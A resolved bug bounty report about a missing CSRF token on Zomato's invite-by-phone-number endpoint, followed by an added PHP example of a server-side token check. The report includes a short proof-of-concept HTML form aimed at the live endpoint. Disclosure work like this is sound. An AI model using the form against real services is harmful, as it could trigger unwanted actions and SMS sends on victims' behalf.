CSRF AT INVITING PEOPLE THROUGH PHONE NUMBER
Zomato
Reported by
kiraak-boy
Vulnerability Details
Technical details and impact analysis
Hello,
Please add a CSRF token when inviting the user through phone number. You have good rate limit protection, but at the same time add a CSRF token:
CODE :-
<html>
<body>
<form action="https://www.zomato.com/php/restaurantSmsHandler">
<input type="hidden" name="type" value="zomato-app-details" />
<input type="hidden" name="mobile_no" value="xxxxxxxxxxxxxx" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Thanks!
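
A server-side check of the kind the report asks for, as an added example that is not part of the original report and not Zomato's code. The function names, the `csrf_token` field name and the sample requests are assumptions made for illustration.

```php
<?php
// Added example: hypothetical CSRF guard for an SMS-invite handler.
// Function names and the "csrf_token" field are assumptions, not the site's own code.

function issue_csrf_token(array &$session): string
{
    // One random token per session, embedded as a hidden field in the genuine form.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function invite_request_allowed(string $method, array $fields, array $session): bool
{
    // State-changing action: accept POST only, so a GET form or bare link cannot trigger it.
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $fields['csrf_token'] ?? '';
    if (!is_string($supplied) || $expected === '' || $supplied === '') {
        return false;
    }
    // Constant-time comparison of the session token and the submitted token.
    return hash_equals($expected, $supplied);
}

// Constructed sample requests (not captured traffic).
$session = [];
$token = issue_csrf_token($session);
$requests = [
    'GET form, no token'      => ['GET',  ['type' => 'zomato-app-details', 'mobile_no' => '0000000000']],
    'POST without token'      => ['POST', ['type' => 'zomato-app-details', 'mobile_no' => '0000000000']],
    'POST with wrong token'   => ['POST', ['mobile_no' => '0000000000', 'csrf_token' => str_repeat('0', 64)]],
    'POST with session token' => ['POST', ['mobile_no' => '0000000000', 'csrf_token' => $token]],
];
foreach ($requests as $label => [$method, $fields]) {
    $ok = invite_request_allowed($method, $fields, $session);
    printf("%-26s %s\n", $label, $ok ? 'accepted' : 'rejected (403)');
}
```

Only the last constructed request is accepted, because a page on another origin cannot read the token stored in the victim's session.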
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Violation of Secure Design Principles